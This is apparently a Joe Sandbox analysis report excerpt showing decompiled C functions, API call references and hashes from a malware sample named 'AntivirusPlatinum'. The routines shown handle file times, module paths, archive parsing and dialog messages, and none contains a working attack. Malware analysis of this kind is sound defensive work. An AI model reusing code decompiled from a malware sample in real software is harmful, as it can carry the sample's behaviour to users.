                                                                                                                                                  • Instruction ID: 9e38d73e54712bb0db1db56ca4312cf1ed03176aaf8c23fdc66e675287b3661e
                                                                                                                                                  • Opcode Fuzzy Hash: 5fae4e63873776018887329e3184201ecfcb9ea2296943329708b5b4d23760c0
                                                                                                                                                  • Instruction Fuzzy Hash: 473175351441899FCB128E58C490AEE3BA4EB15340B444977F991AB391C37ADD85CBAF
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E004053C5(intOrPtr __ecx, intOrPtr* _a4, signed char _a7, intOrPtr* _a8, signed char _a11, intOrPtr* _a12) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _v24;
                                                                                                                                                  				void* _v32;
                                                                                                                                                  				int _t32;
                                                                                                                                                  				signed char _t40;
                                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                  
                                                                                                                                                  				_v8 = __ecx;
                                                                                                                                                  				_t43 = _a4;
                                                                                                                                                  				if(_t43 == 0) {
                                                                                                                                                  					L2:
                                                                                                                                                  					_a7 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a7 = 1;
                                                                                                                                                  					if( *_t43 == 0) {
                                                                                                                                                  						goto L2;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t50 = _a8;
                                                                                                                                                  				if(_t50 == 0) {
                                                                                                                                                  					L5:
                                                                                                                                                  					_a11 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_a11 = 1;
                                                                                                                                                  					if( *_t50 == 0) {
                                                                                                                                                  						goto L5;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				_t53 = _a12;
                                                                                                                                                  				if(_t53 == 0 ||  *_t53 == 0) {
                                                                                                                                                  					_t40 = 0;
                                                                                                                                                  				} else {
                                                                                                                                                  					_t40 = 1;
                                                                                                                                                  				}
                                                                                                                                                  				if(_a7 != 0) {
                                                                                                                                                  					E0040DE21(_t43,  &_v16);
                                                                                                                                                  				}
                                                                                                                                                  				if(_a11 != 0) {
                                                                                                                                                  					E0040DE21(_t50,  &_v32);
                                                                                                                                                  				}
                                                                                                                                                  				if(_t40 != 0) {
                                                                                                                                                  					E0040DE21(_t53,  &_v24);
                                                                                                                                                  				}
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				asm("sbb eax, eax");
                                                                                                                                                  				_t32 = SetFileTime( *(_v8 + 4),  ~(_a11 & 0x000000ff) &  &_v32,  ~(_t40 & 0x000000ff) &  &_v24,  ~(_a7 & 0x000000ff) &  &_v16); // executed
                                                                                                                                                  				return _t32;
                                                                                                                                                  			}












                                                                                                                                                  0x004053cb
                                                                                                                                                  0x004053ce
                                                                                                                                                  0x004053d5
                                                                                                                                                  0x004053df
                                                                                                                                                  0x004053df
                                                                                                                                                  0x004053d7
                                                                                                                                                  0x004053d7
                                                                                                                                                  0x004053dd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004053dd
                                                                                                                                                  0x004053e5
                                                                                                                                                  0x004053ea
                                                                                                                                                  0x004053f4
                                                                                                                                                  0x004053f4
                                                                                                                                                  0x004053ec
                                                                                                                                                  0x004053ec
                                                                                                                                                  0x004053f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004053f2
                                                                                                                                                  0x004053f7
                                                                                                                                                  0x004053fc
                                                                                                                                                  0x00405406
                                                                                                                                                  0x00405402
                                                                                                                                                  0x00405402
                                                                                                                                                  0x00405402
                                                                                                                                                  0x0040540b
                                                                                                                                                  0x00405411
                                                                                                                                                  0x00405411
                                                                                                                                                  0x0040541a
                                                                                                                                                  0x00405422
                                                                                                                                                  0x00405422
                                                                                                                                                  0x00405429
                                                                                                                                                  0x00405431
                                                                                                                                                  0x00405431
                                                                                                                                                  0x0040543c
                                                                                                                                                  0x00405449
                                                                                                                                                  0x00405457
                                                                                                                                                  0x00405465
                                                                                                                                                  0x0040546f

                                                                                                                                                  APIs
                                                                                                                                                  • SetFileTime.KERNELBASE(?,00000000,00000000,00000000,?,?,?), ref: 00405465
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileTime
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1425588814-0
                                                                                                                                                  • Opcode ID: f642364af0ceb2b33661677e8241ac08709fb3ff7d374f00a5f292b6e7a13f2b
                                                                                                                                                  • Instruction ID: b7019616bdd90384b6d06fdeb4558485ba74c302507b6c1e4955c3b22ac41809
                                                                                                                                                  • Opcode Fuzzy Hash: f642364af0ceb2b33661677e8241ac08709fb3ff7d374f00a5f292b6e7a13f2b
                                                                                                                                                  • Instruction Fuzzy Hash: B4219231500599AECF11DFB8C841AFF77A8DB11341B18807BE856EB2C1E678DB44DB69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                                  			E0040928C(signed int __eax, intOrPtr* __ecx, void* __edx, void* __esi) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				CHAR* _t66;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                  				void* _t76;
                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                  				intOrPtr _t79;
                                                                                                                                                  				intOrPtr _t80;
                                                                                                                                                  				intOrPtr _t82;
                                                                                                                                                  				char _t95;
                                                                                                                                                  				intOrPtr _t104;
                                                                                                                                                  				void* _t110;
                                                                                                                                                  				char _t111;
                                                                                                                                                  				void* _t116;
                                                                                                                                                  				void* _t117;
                                                                                                                                                  				void* _t118;
                                                                                                                                                  				void* _t119;
                                                                                                                                                  				void* _t122;
                                                                                                                                                  				intOrPtr* _t125;
                                                                                                                                                  				signed int _t127;
                                                                                                                                                  
                                                                                                                                                  				_t110 = __edx;
                                                                                                                                                  				_t97 = __ecx;
                                                                                                                                                  				_t63 = __eax ^ _t127;
                                                                                                                                                  				if(_t63 >= 0) {
                                                                                                                                                  					 *((intOrPtr*)(__esi + 0x6a))();
                                                                                                                                                  					_push( *(_t127 + 8));
                                                                                                                                                  					_t125 = __ecx;
                                                                                                                                                  					_t65 = E0040A3AD();
                                                                                                                                                  					_t66 = _t127 - 0x40c;
                                                                                                                                                  					if(_t65 != 0) {
                                                                                                                                                  						L5:
                                                                                                                                                  						E0040A477(_t66,  *(_t127 + 8));
                                                                                                                                                  						E00404EC3(_t127 - 0x102c);
                                                                                                                                                  						_t70 = E00405097(_t127 - 0x102c, _t127 - 0x40c, 0, 1, 0); // executed
                                                                                                                                                  						if(_t70 != 0) {
                                                                                                                                                  							 *(_t127 + 8) =  *(_t127 + 8) | 0xffffffff;
                                                                                                                                                  							 *((intOrPtr*)(_t127 - 4)) = 0;
                                                                                                                                                  							_push(_t95);
                                                                                                                                                  							L8:
                                                                                                                                                  							while( *(_t127 + 8) == 0xffffffff) {
                                                                                                                                                  								_t80 = E00404FDC(_t127 - 0x102c, _t110); // executed
                                                                                                                                                  								 *((intOrPtr*)(_t127 - 8)) = _t80;
                                                                                                                                                  								_t82 = E0040568A(_t127 - 0x102c, _t110, _t127 - 0x302c, 0x2000); // executed
                                                                                                                                                  								 *((intOrPtr*)(_t127 - 0xc)) = _t82;
                                                                                                                                                  								if(_t82 >= 0x10) {
                                                                                                                                                  									_t122 = 0;
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                  										if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A53D(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A53D(_t127 + _t122 - 0x302a, 0x412570, 4) != 0) {
                                                                                                                                                  											_t122 = _t122 + 1;
                                                                                                                                                  											if(_t122 <=  *((intOrPtr*)(_t127 - 0xc)) + 0xfffffff0) {
                                                                                                                                                  												continue;
                                                                                                                                                  											} else {
                                                                                                                                                  												L20:
                                                                                                                                                  												E004054ED(_t127 - 0x102c,  *((intOrPtr*)(_t127 - 0xc)) +  *((intOrPtr*)(_t127 - 8)) - 0x10, 0, 0);
                                                                                                                                                  												 *((intOrPtr*)(_t127 - 4)) =  *((intOrPtr*)(_t127 - 4)) + 1;
                                                                                                                                                  												if( *((intOrPtr*)(_t127 - 4)) < 0x40) {
                                                                                                                                                  													goto L8;
                                                                                                                                                  												} else {
                                                                                                                                                  													if( *(_t127 + 8) != 0xffffffff) {
                                                                                                                                                  														goto L22;
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										goto L43;
                                                                                                                                                  									}
                                                                                                                                                  									 *(_t127 + 8) = _t122 +  *((intOrPtr*)(_t127 - 8));
                                                                                                                                                  									goto L20;
                                                                                                                                                  								}
                                                                                                                                                  								L43:
                                                                                                                                                  								_t76 = E00405074(_t95, _t127 - 0x102c);
                                                                                                                                                  								goto L44;
                                                                                                                                                  							}
                                                                                                                                                  							L22:
                                                                                                                                                  							asm("cdq");
                                                                                                                                                  							_t95 = 0;
                                                                                                                                                  							 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                  							E004054ED(_t127 - 0x102c,  *(_t127 + 8), _t110, 0);
                                                                                                                                                  							_t75 = E0040A1EC( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                  							 *_t125 = _t75;
                                                                                                                                                  							if(_t75 != 0) {
                                                                                                                                                  								 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                  								_t77 = E0040568A(_t127 - 0x102c, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                  								_t104 = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                  								if(_t77 > 0) {
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t79 =  *_t125;
                                                                                                                                                  										_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                  										_t95 = _t95 + 1;
                                                                                                                                                  										if(_t111 == 0) {
                                                                                                                                                  											goto L42;
                                                                                                                                                  										}
                                                                                                                                                  										if(_t111 != 0x5c) {
                                                                                                                                                  											if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                  												_t111 = 0xc;
                                                                                                                                                  											}
                                                                                                                                                  											goto L40;
                                                                                                                                                  										} else {
                                                                                                                                                  											_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                  											if(_t116 == 0) {
                                                                                                                                                  												 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                  												goto L36;
                                                                                                                                                  											} else {
                                                                                                                                                  												_t117 = _t116 - 0x3a;
                                                                                                                                                  												if(_t117 == 0) {
                                                                                                                                                  													 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                  													goto L36;
                                                                                                                                                  												} else {
                                                                                                                                                  													_t118 = _t117 - 0x12;
                                                                                                                                                  													if(_t118 == 0) {
                                                                                                                                                  														 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                  														goto L36;
                                                                                                                                                  													} else {
                                                                                                                                                  														_t119 = _t118 - 4;
                                                                                                                                                  														if(_t119 == 0) {
                                                                                                                                                  															 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                  															goto L36;
                                                                                                                                                  														} else {
                                                                                                                                                  															if(_t119 != 0) {
                                                                                                                                                  																L40:
                                                                                                                                                  																 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                  															} else {
                                                                                                                                                  																 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                  																L36:
                                                                                                                                                  																_t95 = _t95 + 1;
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  													}
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  										_t104 = _t104 + 1;
                                                                                                                                                  										if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										goto L42;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								L42:
                                                                                                                                                  								 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                  								 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                  							}
                                                                                                                                                  							goto L43;
                                                                                                                                                  						} else {
                                                                                                                                                  							_t76 = E00405074(_t95, _t127 - 0x102c);
                                                                                                                                                  						}
                                                                                                                                                  						L44:
                                                                                                                                                  					} else {
                                                                                                                                                  						GetModuleFileNameA(0, _t66, 0x400);
                                                                                                                                                  						_t76 = E0040A3D9(_t97, _t127 - 0x40c, 0x5c);
                                                                                                                                                  						if(_t76 != 0) {
                                                                                                                                                  							_t66 = _t76 + 1;
                                                                                                                                                  							goto L5;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					return _t76;
                                                                                                                                                  				} else {
                                                                                                                                                  					 *_t63 =  *_t63 + _t63;
                                                                                                                                                  					return _t63;
                                                                                                                                                  				}
                                                                                                                                                  			}

























                                                                                                                                                  0x0040928c
                                                                                                                                                  0x0040928c
                                                                                                                                                  0x0040928c
                                                                                                                                                  0x0040928e
                                                                                                                                                  0x0040929f
                                                                                                                                                  0x004092a3
                                                                                                                                                  0x004092a6
                                                                                                                                                  0x004092a8
                                                                                                                                                  0x004092af
                                                                                                                                                  0x004092b5
                                                                                                                                                  0x004092dc
                                                                                                                                                  0x004092e0
                                                                                                                                                  0x004092ec
                                                                                                                                                  0x00409304
                                                                                                                                                  0x0040930b
                                                                                                                                                  0x0040931d
                                                                                                                                                  0x00409321
                                                                                                                                                  0x00409324
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409325
                                                                                                                                                  0x00409335
                                                                                                                                                  0x0040933a
                                                                                                                                                  0x0040934f
                                                                                                                                                  0x00409354
                                                                                                                                                  0x0040935a
                                                                                                                                                  0x00409360
                                                                                                                                                  0x00409362
                                                                                                                                                  0x00409362
                                                                                                                                                  0x0040936c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409393
                                                                                                                                                  0x004093be
                                                                                                                                                  0x004093c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093c6
                                                                                                                                                  0x004093d0
                                                                                                                                                  0x004093e5
                                                                                                                                                  0x004093ea
                                                                                                                                                  0x004093f1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093f7
                                                                                                                                                  0x004093fb
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093fb
                                                                                                                                                  0x004093f1
                                                                                                                                                  0x004093c4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409393
                                                                                                                                                  0x004093cd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004093cd
                                                                                                                                                  0x004094bd
                                                                                                                                                  0x004094c3
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004094c8
                                                                                                                                                  0x00409401
                                                                                                                                                  0x00409404
                                                                                                                                                  0x00409405
                                                                                                                                                  0x00409410
                                                                                                                                                  0x00409417
                                                                                                                                                  0x00409425
                                                                                                                                                  0x0040942a
                                                                                                                                                  0x0040942e
                                                                                                                                                  0x00409437
                                                                                                                                                  0x00409445
                                                                                                                                                  0x0040944a
                                                                                                                                                  0x0040944e
                                                                                                                                                  0x00409451
                                                                                                                                                  0x00409453
                                                                                                                                                  0x00409453
                                                                                                                                                  0x00409455
                                                                                                                                                  0x00409459
                                                                                                                                                  0x0040945c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409461
                                                                                                                                                  0x004094a1
                                                                                                                                                  0x004094aa
                                                                                                                                                  0x004094aa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409463
                                                                                                                                                  0x00409467
                                                                                                                                                  0x0040946a
                                                                                                                                                  0x00409497
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040946c
                                                                                                                                                  0x0040946c
                                                                                                                                                  0x0040946f
                                                                                                                                                  0x00409491
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409471
                                                                                                                                                  0x00409471
                                                                                                                                                  0x00409474
                                                                                                                                                  0x0040948b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00409476
                                                                                                                                                  0x00409476
                                                                                                                                                  0x00409479
                                                                                                                                                  0x00409485
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040947b
                                                                                                                                                  0x0040947d
                                                                                                                                                  0x004094ab
                                                                                                                                                  0x004094ab
                                                                                                                                                  0x0040947f
                                                                                                                                                  0x0040947f
                                                                                                                                                  0x0040949b
                                                                                                                                                  0x0040949b
                                                                                                                                                  0x0040949b
                                                                                                                                                  0x0040947d
                                                                                                                                                  0x00409479
                                                                                                                                                  0x00409474
                                                                                                                                                  0x0040946f
                                                                                                                                                  0x0040946a
                                                                                                                                                  0x004094ae
                                                                                                                                                  0x004094b2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004094b2
                                                                                                                                                  0x00409453
                                                                                                                                                  0x004094b4
                                                                                                                                                  0x004094b6
                                                                                                                                                  0x004094ba
                                                                                                                                                  0x004094ba
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040930d
                                                                                                                                                  0x00409313
                                                                                                                                                  0x00409313
                                                                                                                                                  0x004094c9
                                                                                                                                                  0x004092b7
                                                                                                                                                  0x004092bf
                                                                                                                                                  0x004092ce
                                                                                                                                                  0x004092d5
                                                                                                                                                  0x004092db
                                                                                                                                                  0x00000000
                                                                                                                                                  0x004092db
                                                                                                                                                  0x004092d5
                                                                                                                                                  0x004094cc
                                                                                                                                                  0x00409290
                                                                                                                                                  0x00409290
                                                                                                                                                  0x00409292
                                                                                                                                                  0x00409292

                                                                                                                                                  APIs
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098EC,?,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D3F9,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 004092BF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileModuleName
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 514040917-0
                                                                                                                                                  • Opcode ID: 8a059818d79f815d1da1c0fdc08b2b0f8e86ca2838fa7738cf816effd15a2a51
                                                                                                                                                  • Instruction ID: 5e47cf0ed6a20ba9c8d57e52932549557f7a3f3f30f472f0507eb0aadce207e7
                                                                                                                                                  • Opcode Fuzzy Hash: 8a059818d79f815d1da1c0fdc08b2b0f8e86ca2838fa7738cf816effd15a2a51
                                                                                                                                                  • Instruction Fuzzy Hash: 3A0184B6500204A9DF20A721DD45EEF3778DB95344F0045BBFB46F50C2DA789D49CD69
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00406045(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                  				void* _t12;
                                                                                                                                                  				intOrPtr _t19;
                                                                                                                                                  
                                                                                                                                                  				_t19 = _a12;
                                                                                                                                                  				 *((char*)(_t19 + 0x109c)) = 0;
                                                                                                                                                  				if(E00407279(__ecx, _a4, _a8) == 0) {
                                                                                                                                                  					_t12 = E00405C10(__ecx, __edx, __eflags, 0xffffffff, _a4, _a8, _t19);
                                                                                                                                                  					__eflags = _t12 - 0xffffffff;
                                                                                                                                                  					if(_t12 == 0xffffffff) {
                                                                                                                                                  						goto L1;
                                                                                                                                                  					}
                                                                                                                                                  					FindClose(_t12); // executed
                                                                                                                                                  					_t8 = _t19 + 0x1098;
                                                                                                                                                  					 *_t8 =  *(_t19 + 0x1098) & 0x00000000;
                                                                                                                                                  					__eflags =  *_t8;
                                                                                                                                                  					 *((char*)(_t19 + 0xc10)) = E0040579E( *((intOrPtr*)(_t19 + 0xc08)));
                                                                                                                                                  					return 1;
                                                                                                                                                  				}
                                                                                                                                                  				L1:
                                                                                                                                                  				return 0;
                                                                                                                                                  			}





                                                                                                                                                  0x0040604c
                                                                                                                                                  0x00406052
                                                                                                                                                  0x00406060
                                                                                                                                                  0x0040606f
                                                                                                                                                  0x00406074
                                                                                                                                                  0x00406077
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040607a
                                                                                                                                                  0x00406086
                                                                                                                                                  0x00406086
                                                                                                                                                  0x00406086
                                                                                                                                                  0x00406092
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00406098
                                                                                                                                                  0x00406062
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,?,?,?,004049B4,?,?,?,00000000,?,?), ref: 0040607A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseFind
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1863332320-0
                                                                                                                                                  • Opcode ID: 016139225d3950fc2726837b29d2660fc3c0a39c7cd46741710581f0b07a340e
                                                                                                                                                  • Instruction ID: 1ba89066e6b26492de0991d89586bb912489ebcd511f1a1df6c7eb89e8bf18c6
                                                                                                                                                  • Opcode Fuzzy Hash: 016139225d3950fc2726837b29d2660fc3c0a39c7cd46741710581f0b07a340e
                                                                                                                                                  • Instruction Fuzzy Hash: CAF0E931004744B7CF215FB58805AD73F54EF02334F008A1AF9BD262D2C67661A4EB75
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E00405051(void* __ecx) {
                                                                                                                                                  				void* _t2;
                                                                                                                                                  				long _t3;
                                                                                                                                                  
                                                                                                                                                  				_t2 =  *(__ecx + 4);
                                                                                                                                                  				if(_t2 != 0xffffffff) {
                                                                                                                                                  					_t3 = GetFileType(_t2); // executed
                                                                                                                                                  					if(_t3 == 2 || _t3 == 3) {
                                                                                                                                                  						return 1;
                                                                                                                                                  					} else {
                                                                                                                                                  						return 0;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					return 0;
                                                                                                                                                  				}
                                                                                                                                                  			}





                                                                                                                                                  0x00405051
                                                                                                                                                  0x00405057
                                                                                                                                                  0x0040505d
                                                                                                                                                  0x00405066
                                                                                                                                                  0x00405073
                                                                                                                                                  0x0040506d
                                                                                                                                                  0x0040506f
                                                                                                                                                  0x0040506f
                                                                                                                                                  0x00405059
                                                                                                                                                  0x0040505b
                                                                                                                                                  0x0040505b

                                                                                                                                                  APIs
                                                                                                                                                  • GetFileType.KERNELBASE(?,00405318,?,004056BF,000000FF,?,00000000,?,00000000), ref: 0040505D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileType
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3081899298-0
                                                                                                                                                  • Opcode ID: 9ef2e2e64e8ea27a378ea434a61d5314f25fa8d2862a00f2364391826e643227
                                                                                                                                                  • Instruction ID: 1aa453c7d0f86835216dbc810814f2ca778ec8b6d3a3a4ed52031c25ee967b21
                                                                                                                                                  • Opcode Fuzzy Hash: 9ef2e2e64e8ea27a378ea434a61d5314f25fa8d2862a00f2364391826e643227
                                                                                                                                                  • Instruction Fuzzy Hash: DDC0127091094451CE609538494D45F2346D7433667684BB2E025D12E4CF38CC82FC45
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E0040BB29(CHAR* _a8, char _a12) {
                                                                                                                                                  				char _v1028;
                                                                                                                                                  				void* _t9;
                                                                                                                                                  
                                                                                                                                                  				wvsprintfA( &_v1028, _a8,  &_a12);
                                                                                                                                                  				_t9 = E0040AD46(0,  &_v1028); // executed
                                                                                                                                                  				return _t9;
                                                                                                                                                  			}





                                                                                                                                                  0x0040bb40
                                                                                                                                                  0x0040bb4f
                                                                                                                                                  0x0040bb55

                                                                                                                                                  APIs
                                                                                                                                                  • wvsprintfA.USER32 ref: 0040BB40
                                                                                                                                                    • Part of subcall function 0040AD46: GetDlgItem.USER32 ref: 0040AD57
                                                                                                                                                    • Part of subcall function 0040AD46: ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE8F), ref: 0040AD84
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040AD90
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(00000000,000000C2,00000000,0041259A), ref: 0040AD9F
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040ADB3
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(?,0000043A,00000000,?), ref: 0040ADCA
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE05
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000C2,00000000,0040AE8F), ref: 0040AE14
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040AE1C
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE40
                                                                                                                                                    • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000C2,00000000,004125D0), ref: 0040AE51
